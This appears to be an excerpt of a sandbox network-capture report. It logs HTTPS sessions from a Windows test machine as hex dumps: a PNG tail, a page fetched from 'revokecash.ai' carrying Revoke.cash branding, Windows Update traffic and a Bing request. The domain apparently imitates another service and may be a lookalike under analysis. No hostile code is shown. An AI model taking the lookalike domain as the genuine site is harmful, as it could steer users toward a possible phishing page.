                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 96 4c 84 6a 18 3f fd f9 40 e2 4f 2a 94 85 be c7 ec 65 5f d0 aa 25 92 cf 4f 96 de b0 af 90 a6 55 2c 35 97 ee c4 82 d6 f5 4b 49 3f b9 85 55 c6 92 ac d3 b4 7e 11 3e c5 3a 49 4f 3f e8 4c 99 96 ee e7 4e b6 87 53 bd 96 9f 1c 10 99 56 b6 99 4b b7 b0 11 ba 5e 5a 02 02 bd 5b d2 32 9e b5 68 68 fa df f9 4e cb 4f e6 2d 1b c7 44 b6 8f 52 71 db be a5 87 a8 dc 18 91 1a 4a a0 10 1f 96 b6 5b 5e 8f e4 53 f9 c9 01 2b 44 27 dd 25 59 95 69 5d 24 7c 8a 1f 14 96 ab 8f 48 ab af 92 67 5a 5d 62 4a ae 17 de c3 27 c7 df b2 49 88 7f 8f 35 45 e5 a7 f3 3f f8 46 9e 93 89 50 13 4b f2 0c 2c 14 ca 79 8d 3f 15 8d d9 53 7b 58 8d e4 f4 48 fc 56 fe e6 0c 32 5c 15 4b 53 a3 9d eb 2a b3 50 35 ae 68 2c cb 9a 4c 2b 87 d0 14 c7 80 96 f4 11 25 03 72 37 68 9b f5 1b fd 04 c2 9f d7 9c 2d 99 d6 67 6c 0a
                                                                          Data Ascii: Lj?@O*e_%OU,5KI?U~>:IO?LNSVK^Z[2hhNO-DRqJ[^S+D'%Yi]$|HgZ]bJ'I5E?FPK,y?S{XHV2\KS*P5h,L+%r7h-gl
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: d0 14 a5 63 a3 10 b3 b2 ba 65 85 6d 0d 67 5a cc fd 1c d1 77 e3 43 30 82 16 55 fb a2 9c 06 a9 42 d1 ad 52 de e6 0c 37 01 e4 4e a2 68 c2 25 ec c1 28 98 be 89 4b 5a cb a4 1d 8f 01 95 aa 13 bc a7 d2 97 c3 ed 61 29 33 d3 22 f4 9f 40 98 4b 29 9f e2 36 d7 a7 b8 a2 7c ba f2 cd cc 28 fa 06 e3 6a 5a 05 8b f0 66 02 70 7a 58 78 1e bf 1f ec ee 3a 5b 6a 17 88 fc ac ea 2f 0c 5a 5c 63 d5 4d 62 7b e8 fb 7e 5a 9f f1 0d b0 33 13 68 ee 1c 90 67 5a b0 cb 03 f3 02 88 a0 55 e2 77 4d 8b 9a d1 72 85 a9 92 e2 0c 61 49 5e 08 07 9b 00 36 33 83 56 2b 6e 69 bb e8 6f 4d 8b f2 29 5a 86 14 50 c0 ba ce ab 1f e5 bf 84 1d f1 dc da c3 f7 38 d3 f2 77 97 87 6b d8 af f1 4e f1 04 95 40 c3 95 e8 53 fd 1a ee f2 c0 14 e2 3b f7 e1 6c d0 72 3f 07 2d 62 fc 99 8d 7e 8a 89 e0 8e cb 77 2d 13 46 4e 81 41
                                                                          Data Ascii: cemgZwC0UBR7Nh%(KZa)3"@K)6|(jZfpzXx:[j/Z\cMb{~Z3hgZUwMraI^63V+nioM)ZP8wkN@S;lr?-b~w-FNA
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 94 e8 d0 14 ad 14 5c 69 3f e7 11 ed 7d 9a 73 92 64 7a 71 29 a1 66 f2 52 f4 f1 ba 98 e3 19 6b a9 fd 0f 21 9a 79 69 26 df 1f ee 7e 1f 43 d5 3e eb 85 5d b9 9b 7d cc 96 79 f9 86 f8 bb 55 9b 1f d8 21 7c 8a 7a b9 9c 7e 67 bf cf 59 fb e9 e5 fb 51 ee 83 da 17 9f b3 8c 4b 09 35 93 16 27 4d a0 a0 6a 9f f5 b2 84 db 93 19 42 13 84 4f 51 2f 75 ba 35 c5 cc e3 11 ae 04 d1 4b 97 7e 4d 31 d3 f0 f2 18 41 88 97 dc 42 b8 ac a3 72 65 3c d7 3b ce 71 9b 6b 19 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 59 43 e5 72 6e 9e 77 ec 39 1a 13 92 5d bc 7f e0 a5 fb 7d 24 05 1d 35 32 0d 2f fb 51 88 f0 41 ba 6f d7 ff f4 e0 11 7e 9a e9 4f 45 93 93 0c c3 db be 65 5f 4c 8d 21 c9 6f 2f 8b da 8a df a4 fb 76 fd cf c4 27 0f df 10 71
                                                                          Data Ascii: \i?}sdzq)fRk!yi&~C>]}yU!|z~gYQK5'MjBOQ/u5K~M1ABre<;qk`0`0`0`0`0YCrnw9]}$52/QAo~OEe_L!o/v'q
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: d1 5d 0a e1 65 2c bb c7 5c 0f db 82 72 b1 ed 6b 03 39 dd f3 a9 77 33 89 19 7c 4a e8 ec dc cc 03 88 f2 8b 3a 6e 45 ed dc 2a 58 ad 1e aa 8c f0 94 b0 9e 7b aa 82 33 ac 32 df 65 58 31 a8 8a 4a 76 df be 0e 14 29 a0 57 15 7e 36 da 99 db 54 c2 f5 78 8e 79 57 1e b2 85 d5 b7 62 6e 45 ed 5a 3b 5a ee ad da cb 08 33 ac 66 66 7a d1 83 4d 44 8b 69 f4 61 91 60 7d 9a ef 75 2b 68 46 cb 29 fb 32 c2 94 b9 8b db 1d 02 47 e2 12 32 df 4b 27 0d ba bd 8c a3 28 68 dd df 55 fc 96 d6 2d e1 6d 24 74 0a b1 97 f2 f6 32 ae d8 21 54 46 6e 45 6d cd 15 94 fb 2a 0c d8 cf 60 86 c5 14 9d da 70 c0 e2 6a f8 9e 73 0f 1b b0 af 72 6d 00 93 28 51 78 21 d5 63 60 2d 61 17 33 c2 14 e2 fd 2e 7b 87 e9 39 95 84 ca f8 81 2b 32 80 43 f1 c7 f2 00 08 63 fe 36 53 25 bf 8d 15 a1 46 ff 69 58 c9 50 5e c6 f3 dc
                                                                          Data Ascii: ]e,\rk9w3|J:nE*X{32eX1Jv)W~6TxyWbnEZ;Z3ffzMDia`}u+hF)2G2K'(hU-m$t2!TFnEm*`pjsrm(Qx!c`-a3.{9+2Cc6S%FiXP^
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 98 01 0b cf 16 65 d7 52 07 11 38 85 4d 88 4d 72 fa 8b ce 0c ab 93 38 5d e6 56 fa 04 91 09 42 65 5c 22 a6 83 68 cd b0 6e 62 5f dc a2 f3 d3 fe 00 41 f5 65 54 36 1b 8d 02 db 76 28 3a 6e 28 a9 c6 fd c9 d8 73 4a 03 0a 31 63 fa 2a f4 32 c2 0c 2b 97 99 61 6d e3 8f 06 b7 81 69 50 c9 21 2a a6 c7 c0 56 0c 77 6b 90 05 ac a3 ea 5f aa c5 9a 70 f7 8c cc cf b0 62 14 e1 48 21 f6 8f 54 bf 09 6d 0d 43 d2 53 c2 f5 b7 aa bd 0d 6e d3 2c ca b2 20 c3 8a f1 19 7f 34 87 95 0e 0f bc 25 94 75 6b a8 18 57 4d 7f 69 21 7a 11 66 4b c0 8a 50 43 6c 8f 55 96 02 98 61 4d 4b b7 84 cb 5d aa 99 e9 1d d8 c8 1b e8 5a 42 36 af 28 95 91 df 22 39 bc 2c fb 95 f5 48 c9 f9 a2 ec 4b 69 0e 07 ac 92 2c 0a 58 11 76 71 d0 92 db 72 e1 96 50 3a 92 b5 f0 b8 5d a3 a4 f7 50 25 91 59 8c f8 67 90 aa 37 10 be b4
                                                                          Data Ascii: eR8MMr8]VBe\"hnb_AeT6v(:n(sJ1c*2+amiP!*Vwk_pbH!TmCSn, 4%ukWMi!zfKPClUaMK]ZB6("9,HKi,XvqrP:]P%Yg7
                                                                          2023-12-10 16:44:28 UTC57INData Raw: 85 a2 0a 4a b1 c9 b0 dc b1 76 4f ab 71 ea 6b bb 39 25 f4 15 0d c4 c8 31 83 c1 60 30 18 0c 06 83 c1 90 4a fe 0f 9a 92 c4 bf 80 7e 64 b7 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: JvOqk9%1`0J~dIENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          55192.168.2.549776104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:27 UTC636OUTGET / HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: document
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:28 UTC697INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 31 3a
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: ExpressAccept-Ranges: bytesCache-Control: public, max-age=0Last-Modified: Sun, 10 Dec 2023 11:
                                                                          2023-12-10 16:44:28 UTC672INData Raw: 33 37 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 64 61 72 6b 22 20 73 74 79 6c 65 3d 22 2d 2d 77 63 6d 2d 63 6f 6c 6f 72 2d 66 67 2d 31 3a 20 72 67 62 28 32 32 38 2c 32 33 31 2c 32 33 31 29 3b 20 2d 2d 77 63 6d 2d 63 6f 6c 6f 72 2d 66 67 2d 32 3a 20 72 67 62 28 31 34 38 2c 31 35 38 2c 31 35 38 29 3b 20 2d 2d 77 63 6d 2d 63 6f 6c 6f 72 2d 66 67 2d 33 3a 20 72 67 62 28 31 31 30 2c 31 31 39 2c 31 31 39 29 3b 20 2d 2d 77 63 6d 2d 63 6f 6c 6f 72 2d 62 67 2d 31 3a 20 72 67 62 28 32 30 2c 32 30 2c 32 30 29 3b 20 2d 2d 77 63 6d 2d 63 6f 6c 6f 72 2d 62 67 2d 32 3a 20 72 67 62 28 33 39 2c 34 32 2c 34 32 29 3b 20 2d 2d 77 63 6d 2d 63 6f 6c 6f 72 2d 62 67 2d 33 3a 20 72 67 62 28 35
                                                                          Data Ascii: 3708<!DOCTYPE html><html lang="en" class="dark" style="--wcm-color-fg-1: rgb(228,231,231); --wcm-color-fg-2: rgb(148,158,158); --wcm-color-fg-3: rgb(110,119,119); --wcm-color-bg-1: rgb(20,20,20); --wcm-color-bg-2: rgb(39,42,42); --wcm-color-bg-3: rgb(5
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 20 2d 2d 77 63 6d 2d 6e 6f 74 69 66 69 63 61 74 69 6f 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 36 70 78 3b 20 2d 2d 77 63 6d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 32 38 70 78 3b 20 2d 2d 77 63 6d 2d 69 63 6f 6e 2d 62 75 74 74 6f 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 2d 2d 77 63 6d 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 68 69 67 68 6c 69 67 68 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 20 2d 2d 77 63 6d 2d 74 65 78 74 2d 62 69 67 2d 62 6f 6c 64 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 2d 2d 77 63 6d 2d 74 65 78 74 2d 62 69 67 2d 62 6f 6c 64 2d 77 65 69 67 68 74 3a 20 36 30
                                                                          Data Ascii: border-radius: 10px; --wcm-notification-border-radius: 36px; --wcm-secondary-button-border-radius: 28px; --wcm-icon-button-border-radius: 50%; --wcm-button-hover-highlight-border-radius: 10px; --wcm-text-big-bold-size: 20px; --wcm-text-big-bold-weight: 60
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 75 6d 2d 72 65 67 75 6c 61 72 2d 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 33 65 6d 3b 20 2d 2d 77 63 6d 2d 74 65 78 74 2d 6d 65 64 69 75 6d 2d 72 65 67 75 6c 61 72 2d 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 20 2d 2d 77 63 6d 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 27 53 65 67 6f 65 20 55 49 27 2c 20 52 6f 62 6f 74 6f 2c 20 55 62 75 6e 74 75 2c 20 27 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 2d 2d 77 63 6d 2d 66 6f 6e 74 2d 66 65 61 74 75 72 65 2d 73 65 74 74 69 6e 67 73 3a 20 27 74 6e 75 6d 27 20 6f 6e 2c 20 27 6c 6e 75 6d 27 20 6f
                                                                          Data Ascii: um-regular-letter-spacing: -0.03em; --wcm-text-medium-regular-text-transform: none; --wcm-font-family: -apple-system, system-ui, BlinkMacSystemFont, 'Segoe UI', Roboto, Ubuntu, 'Helvetica Neue', sans-serif; --wcm-font-feature-settings: 'tnum' on, 'lnum' o
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 78 2d 61 75 74 6f 20 6d 69 6e 2d 68 2d 73 63 72 65 65 6e 22 3e 0a 09 09 09 09 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 20 72 65 6c 61 74 69 76 65 20 70 2d 34 20 6c 67 3a 70 78 2d 38 20 67 61 70 2d 34 20 6d 62 2d 34 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 38 22 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 20 6c 67 3a 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 34 20 77 2d 32 2f 35 20 66 6c 65 78 2d 77 72 61 70 22 3e 0a 09 09 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 66
                                                                          Data Ascii: x-auto min-h-screen"><header class="flex flex-col relative p-4 lg:px-8 gap-4 mb-4"><div class="flex justify-between items-center gap-8"><div class="hidden lg:flex justify-start items-center gap-4 w-2/5 flex-wrap"><button class="f
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 6e 2d 31 35 30 20 63 75 72 73 6f 72 2d 70 6f 69 6e 74 65 72 20 64 69 73 61 62 6c 65 64 3a 63 75 72 73 6f 72 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 20 66 6f 6e 74 2d 6d 65 64 69 75 6d 20 77 68 69 74 65 73 70 61 63 65 2d 6e 6f 77 72 61 70 20 74 65 78 74 2d 62 6c 61 63 6b 20 76 69 73 69 74 65 64 3a 74 65 78 74 2d 62 6c 61 63 6b 20 64 61 72 6b 3a 74 65 78 74 2d 77 68 69 74 65 20 64 61 72 6b 3a 76 69 73 69 74 65 64 3a 74 65 78 74 2d 77 68 69 74 65 20 64 69 73 61 62 6c 65 64 3a 74 65 78 74 2d 7a 69 6e 63 2d 36 30 30 20 64 61 72 6b 3a 64 69 73 61 62 6c 65 64 3a 74 65 78 74 2d 7a 69 6e 63 2d 34 30 30 20 62 6f 72 64 65 72 2d 6e 6f 6e 65 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 74 65 78 74 2d 6c 67 20 73 68 72 69 6e 6b 2d 30 22 20 6f 6e 43 6c 69 63 6b 3d 22 77
                                                                          Data Ascii: n-150 cursor-pointer disabled:cursor-not-allowed font-medium whitespace-nowrap text-black visited:text-black dark:text-white dark:visited:text-white disabled:text-zinc-600 dark:disabled:text-zinc-400 border-none justify-center text-lg shrink-0" onClick="w
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 6f 72 64 65 72 20 62 6f 72 64 65 72 2d 62 6c 61 63 6b 20 64 61 72 6b 3a 62 6f 72 64 65 72 2d 77 68 69 74 65 20 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 20 73 68 72 69 6e 6b 2d 30 20 7a 2d 31 30 20 6d 74 2d 32 20 6d 61 78 2d 68 2d 38 38 20 6f 76 65 72 66 6c 6f 77 2d 78 2d 68 69 64 64 65 6e 20 6f 76 65 72 66 6c 6f 77 2d 79 2d 73 63 72 6f 6c 6c 20 66 6f 63 75 73 3a 6f 75 74 6c 69 6e 65 2d 6e 6f 6e 65 22 20 69 64 3d 22 6d 6f 72 65 4d 65 6e 75 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 68 69 64 64 65 6e 3d 22 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 64 61 74 61 2d 68 65 61 64 6c 65 73 73 75 69 2d 73 74 61 74 65 3d 22 22 3e 0a 09 09 09 09 09 09 09 09 09 3c 61 20 69 64 3d 22 68 65 61 64 6c 65 73 73
                                                                          Data Ascii: order border-black dark:border-white flex flex-col shrink-0 z-10 mt-2 max-h-88 overflow-x-hidden overflow-y-scroll focus:outline-none" id="moreMenu" role="menu" tabindex="0" hidden="" style="display:none" data-headlessui-state=""><a id="headless
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 3c 61 20 69 64 3d 22 68 65 61 64 6c 65 73 73 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 2d 3a 52 75 67 6c 71 6d 3a 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 69 74 65 6d 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 64 61 74 61 2d 68 65 61 64 6c 65 73 73 75 69 2d 73 74 61 74 65 3d 22 22 20 63 6c 61 73 73 3d 22 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 6f 75 74 6c 69 6e 65 2d 6e 6f 6e 65 20 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 72 69 6e 67 2d 31 20 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 72 69 6e 67 2d 62 6c 61 63 6b 20 64 61 72 6b 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 72 69 6e 67 2d 77 68 69 74 65 20 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 62 6f 72 64 65 72 20 62 6f 72 64 65 72 2d 62 6c 61 63 6b 20
                                                                          Data Ascii: </a><a id="headlessui-menu-item-:Ruglqm:" role="menuitem" tabindex="-1" data-headlessui-state="" class="focus-visible:outline-none focus-visible:ring-1 focus-visible:ring-black dark:focus-visible:ring-white flex items-center border border-black
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 20 74 65 78 74 2d 63 75 72 72 65 6e 74 20 76 69 73 69 74 65 64 3a 74 65 78 74 2d 63 75 72 72 65 6e 74 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 68 6f 76 65 72 3a 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 66 6c 65 78 22 20 68 72 65 66 3d 22 2f 22 3e 0a 09 09 09 09 09 09 09 09 3c 69 6d 67 20 61 6c 74 3d 22 52 65 76 6f 6b 65 2e 63 61 73 68 20 6c 6f 67 6f 22 20 66 65 74 63 68 70 72 69 6f 72 69 74 79 3d 22 68 69 67 68 22 20 77 69 64 74 68 3d 22 32 34 30 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 64 65 63 6f 64 69 6e 67 3d 22 61 73 79 6e 63 22 20 64 61 74 61 2d 6e 69 6d 67 3d 22 31 22 20 63 6c 61 73 73 3d 22 66 69 6c 74 65 72 20 64 61 72 6b 3a 69 6e 76 65 72 74 20 73 68 72 69 6e 6b 2d 30 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74
                                                                          Data Ascii: text-current visited:text-current no-underline hover:no-underline flex" href="/"><img alt="Revoke.cash logo" fetchpriority="high" width="240" height="48" decoding="async" data-nimg="1" class="filter dark:invert shrink-0" style="color:transparent
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 68 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 64 3d 22 4d 33 2e 37 35 20 36 2e 37 35 68 31 36 2e 35 4d 33 2e 37 35 20 31 32 68 31 36 2e 35 6d 2d 31 36 2e 35 20 35 2e 32 35 68 31 36 2e 35 22 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 09 09 09 3c 2f 62 75 74 74 6f 6e 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 22 3e 0a 09 09 09 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 68 2d 39 20 66 6c 65 78 20 67 61 70 2d 32 20 69 74 65
                                                                          Data Ascii: h stroke-linecap="round" stroke-linejoin="round" d="M3.75 6.75h16.5M3.75 12h16.5m-16.5 5.25h16.5"></path></svg></button></div></div></div><div class="flex justify-center"><form class="h-9 flex gap-2 ite


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          56192.168.2.54977552.165.165.26443
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:28 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FNTl6mFZVU2Yvoy&MD=3dvdtXe6 HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                          Host: slscr.update.microsoft.com
                                                                          2023-12-10 16:44:29 UTC560INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 45 78 70 69 72 65 73 3a 20 2d 31 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 30 30 30 31 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 58 41 6f 70 61 7a 56 30 30 58 44 57 6e 4a 43 77 6b 6d 45 57 52 76 36 4a 6b 62 6a 52 41 39 51 53 53 5a 32 2b 65 2f 33 4d 7a 45 6b 3d 5f 32 38 38 30 22 0d 0a 4d 53 2d 43 6f 72 72 65 6c 61 74 69 6f 6e 49 64 3a 20 31 35 65 63 62 66 30 37 2d 63 63 38 34 2d 34 35 64 36 2d
                                                                          Data Ascii: HTTP/1.1 200 OKCache-Control: no-cachePragma: no-cacheContent-Type: application/octet-streamExpires: -1Last-Modified: Mon, 01 Jan 0001 00:00:00 GMTETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"MS-CorrelationId: 15ecbf07-cc84-45d6-
                                                                          2023-12-10 16:44:29 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                          2023-12-10 16:44:29 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          57192.168.2.54978023.1.237.91443
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:28 UTC2148OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                          Origin: https://www.bing.com
                                                                          Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                          Accept: */*
                                                                          Accept-Language: en-CH
                                                                          Content-type: text/xml
                                                                          X-Agent-DeviceId: 01000A410900D492
                                                                          X-BM-CBT: 1696428841
                                                                          X-BM-DateFormat: dd/MM/yyyy
                                                                          X-BM-DeviceDimensions: 784x984
                                                                          X-BM-DeviceDimensionsLogical: 784x984
                                                                          X-BM-DeviceScale: 100
                                                                          X-BM-DTZ: 120
                                                                          X-BM-Market: CH
                                                                          X-BM-Theme: 000000;0078d7
